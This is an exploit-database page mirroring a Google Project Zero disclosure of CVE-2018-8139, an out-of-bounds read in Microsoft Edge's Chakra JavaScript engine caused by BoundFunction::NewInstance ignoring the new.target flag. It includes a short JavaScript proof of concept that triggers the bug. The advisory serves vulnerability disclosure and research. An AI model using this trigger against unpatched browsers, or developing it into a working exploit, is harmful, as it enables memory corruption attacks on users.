Advertisement






Microsoft Edge Chakra JIT BoundFunction::NewInstance Bug

CVE Category Price Severity
CVE-2018-8139 CWE-119 $50,000 High
Author Risk Exploitation Type Date
Google Project Zero High Remote 2018-07-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.791932 0.83485

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070138

Below is a copy:

Microsoft Edge Chakra JIT BoundFunction::NewInstance Bug
Microsoft Edge: Chakra: A bug in BoundFunction::NewInstance 

CVE-2018-8139


BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_NewTarget flag which indicates that there's an extra argument (new.target) at the end of the argument array. So the size of the new argument array created with the CallFlags_NewTarget flag will be always 1 less then required, this leads to an OOB read.

PoC:
function func() {
    new.target.x;
}

let bound = func.bind({}, 1);

Reflect.construct(bound, []);



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.